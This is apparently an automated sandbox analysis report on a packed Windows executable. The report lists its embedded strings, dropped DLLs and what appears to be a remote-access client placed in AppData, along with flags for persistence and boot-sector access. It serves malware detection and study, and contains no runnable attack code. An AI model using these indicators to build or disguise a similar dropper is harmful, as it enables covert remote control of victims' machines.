                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716456872.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: BUenB12U2a.exe, 00000001.00000002.1965803034.00007FFDFADC0000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: BUenB12U2a.exe, 00000001.00000002.1966827641.00007FFDFB211000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: BUenB12U2a.exe, 00000001.00000002.1970527009.00007FFE007E4000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\PCICL32.pdb source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713321376.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714286119.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1712921749.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715691868.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716224988.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: BUenB12U2a.exe, 00000001.00000002.1966827641.00007FFDFB211000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713600901.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: BUenB12U2a.exe, 00000001.00000002.1967696079.00007FFDFB65B000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716134858.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdbN source: BUenB12U2a.exe, 00000001.00000003.1800970683.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1800179941.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1800730653.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1801612970.00000210111C7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716684625.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715430142.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdbIsDBCSLeadByte4CompareStringAH source: BUenB12U2a.exe, 00000001.00000003.1799328127.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.00000210111CB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715513195.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714452192.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdbP@ source: BUenB12U2a.exe, 00000001.00000003.1803194949.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1802845516.00000210111C8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713390708.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1972151598.00007FFE126EC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713747367.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1972663223.00007FFE130C3000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1713680258.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713960779.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716385209.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1799122999.000002101120B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799328127.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.0000021011130000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.00000210111CB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714204693.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: BUenB12U2a.exe, 00000001.00000002.1959274900.0000021010910000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715691868.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: 0x74DC4D47 [Tue Feb 17 01:39:19 2032 UTC]
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_1070CC8F LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_1070CC8F
                                Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
                                Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                                Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
                                Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
                                Source: python311.dll.0.drStatic PE information: section name: PyRuntim
                                Source: ucrtbase.dll.0.drStatic PE information: section name: fothk
                                Source: ucrtbase.dll.0.drStatic PE information: section name: .fptable
                                Source: PCICL32.DLL.1.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA54AEE push 6FFDC5D5h; iretd 1_2_00007FFDFAA54AF4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA576D3 push 6FFDC5D5h; iretd 1_2_00007FFDFAA576D9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA54FEA push 6FFDC5C3h; iretd 1_2_00007FFDFAA54FF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA57425 push 60F5C5F1h; iretd 1_2_00007FFDFAA5742D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA54F9E push 6FFDC5CAh; ret 1_2_00007FFDFAA54FA4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA54640 push 60F5C5F1h; iretd 1_2_00007FFDFAA54648
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA57983 push 6FFDC5CAh; ret 1_2_00007FFDFAA57989
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA579CF push 6FFDC5C3h; iretd 1_2_00007FFDFAA579D5
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00784021 push rcx; ret 1_2_00007FFE00784022
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126DD4A1 push rsi; iretd 1_2_00007FFE126DD4D1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9A91D2A5 pushad ; iretd 3_2_00007FFD9A91D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9AB0704D pushad ; iretd 3_2_00007FFD9AB0704E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_10705B60 push eax; ret 6_2_10705B8E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3559A7 push 3BFFFFFFh; retf 6_2_6C3559AC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C35B99C push edi; ret 6_2_6C35B9AB
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C35BA27 push edi; ret 6_2_6C35BA29
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C356AF5 push ecx; ret 6_2_6C356B08
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3641EF push ecx; ret 6_2_6C364202
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C552D80 push eax; ret 6_2_6C552D9E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C560995 push ecx; ret 6_2_6C5609A8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C57A6AA push EF3FEFD4h; iretd 6_2_6C57A6B1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C579CD8 pushad ; iretd 6_2_6C579CE6
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C56BF60 push ecx; ret 6_2_6C56BF73
                                Source: msvcr100.dll.1.drStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                barindex
                                Contains functionality to infect the boot sector
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, \\.\PhysicalDrive%d1_2_00007FFE10302B00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, PhysicalDrive%i1_2_00007FFE10302B00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i1_2_00007FFE10302B00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i1_2_00007FFE10302B00
                                Found pyInstaller with non standard icon
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: "C:\Users\user\Desktop\BUenB12U2a.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\python3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\python311.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\_elementtree.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\pyexpat.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\select.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\ucrtbase.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\client32.exeJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\_bz2.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\_queue.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-fibers-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\libcrypto-3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\psutil\_psutil_windows.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\_lzma.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\_decimal.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\_socket.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\_ssl.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-sysinfo-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\libssl-3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-kernel32-legacy-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\libffi-8.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C344F80 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,6_2_6C344F80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C333F40 GetPrivateProfileIntA,6_2_6C333F40
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C333B90 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_6C333B90
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C333BC7 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_6C333BC7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C345318 GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,6_2_6C345318

                                Boot Survival

                                barindex
                                Contains functionality to infect the boot sector
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, \\.\PhysicalDrive%d1_2_00007FFE10302B00
